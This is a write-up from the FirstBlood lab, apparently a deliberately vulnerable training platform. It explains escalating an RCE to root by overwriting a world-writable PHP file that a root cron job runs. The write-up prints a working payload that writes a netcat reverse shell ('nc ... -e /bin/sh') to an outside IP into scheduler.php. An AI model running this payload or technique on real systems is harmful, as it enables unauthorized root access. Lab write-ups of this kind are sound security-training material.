FirstBlood-#806 — Privilege escalation when having root
This issue was discovered on FirstBlood v2.0.0 (issues patched)
On 2021-10-28, twsec Level 2 reported:
from deserialization , we can get an RCE, but we're not root on the machine , this report explains how i was able to explain how i did that.
- with the rce i'm the user fb-exec
made a few google search on linux priv escalation cheat sheet , and they talk about cron jobs so we try to find what kind of cronjobs we have
2.list the cron jobs
firstblood and php are of interest
we cat firstblood and find the following:
php scheduler.php is of interest now we need to find scheduler.php
ls -al to see the permission on this file:
and we see write access, but first lets see it's contents
this file belongs to root but fb-exec can write on it so we prepare our payload
printf "<?php system('nc 22.214.171.124 6789 -e /bin/sh'); ?>" > /app/firstblood/scheduler.php
this command overwrites the scheduler.php
and this is what it contains now
now on our server we have to listen on that port and wait.
once we get our connection, we check who we are and we're root
FirstBlood ID: 35
Vulnerability Type: RCE
A cronjob is set to execute the file /app/firstblood/scheduler.php every minute under the root user. This file is writable by the firstblood php pool user (fb-exec). The [checkproof bug] can be combined with this to obtain root privileges.